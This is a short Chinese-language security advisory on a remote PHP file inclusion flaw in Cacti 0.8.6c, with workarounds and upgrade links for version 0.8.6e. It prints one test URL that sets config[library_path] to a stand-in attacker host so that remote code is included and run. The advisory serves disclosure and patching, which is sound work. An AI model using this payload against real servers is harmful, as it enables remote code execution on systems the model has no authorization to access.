发布日期：2005-06-23

更新日期：2005-06-23nt>

受影响系统：

Raxnet Cacti 0.8.6c

不受影响系统：

Raxnet Cacti 0.8.6e

描述：Cacti是一款轮循数据库（RRD）工具，可帮助从数据库信息创建图形，有多个Linux版本。Cacti的top_graph_header.php脚本中存在输入验证错误，允许攻击者包含远程站点的任意PHP代码，这可能导致以Web Server进程的权限执行任意代码。

漏洞起因是脚本相信了用户提供的library_path变量。

测试方法：（以下程序或方法可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！）

http://example.com/path_of_cacti/include/top_graph_header.php?config[library_path]=http://attackersite.com/

临时解决方法：（如果您不能立刻安装补丁或者升级，建议您采取以下措施以降低威胁）

* 对访问Cacti安装要求认证；将对使用Cacti的web server的访问仅限于可信任的主机。

厂商补丁：

Gentoo已经为此发布了一个安全公告（GLSA-200506-20）以及相应补丁:

GLSA-200506-20：Cacti: Several vulnerabilities

链接：http://security.gentoo.org/glsa/glsa-200506-20.xml

所有Cacti用户都应升级到最新版本:

# emerge --sync # emerge --ask --oneshot --verbose ">=net-analyzer/cacti-0.8.6e"

Raxnet已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载cacti 0.8.6e版本：

http://www.cacti.net/downloads/cacti-0.8.6e.tar.gz

http://www.cacti.net/downloads/cacti-0.8.6e.zip

OVER